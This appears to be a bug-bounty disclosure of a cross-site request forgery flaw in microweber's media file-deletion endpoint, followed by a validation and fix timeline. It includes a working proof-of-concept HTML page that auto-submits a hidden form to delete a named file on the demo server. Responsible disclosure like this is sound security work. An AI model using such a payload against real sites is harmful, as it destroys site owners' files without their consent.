Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Sep 13th 2021


Description

Attacker able to delete any file In Files module (if this module enabled) there isn't any csrf protection in this endpoint.

Proof of Concept

After open the PoC.html file you can see that the file with name 1.jpg will be deleted. //PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/media/delete_media_file">
      <input type="hidden" name="path&#91;&#93;" value="&#47;home&#47;demomicr&#47;public&#95;html&#47;demo&#47;userfiles&#47;media&#47;default&#47;1&#46;jpg" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
We have contacted a member of the microweber team and are waiting to hear back 3 months ago
We have contacted a member of the microweber team and are waiting to hear back 3 months ago
Peter Ivanov validated this vulnerability 3 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Peter Ivanov confirmed that a fix has been merged on 6fb8d8 3 months ago
Peter Ivanov has been awarded the fix bounty
api_callbacks.php#L160-L168 has been validated
media.php#L11-L20 has been validated
Peter Ivanov
3 months ago

Maintainer


Thanks for report, issue it fixed now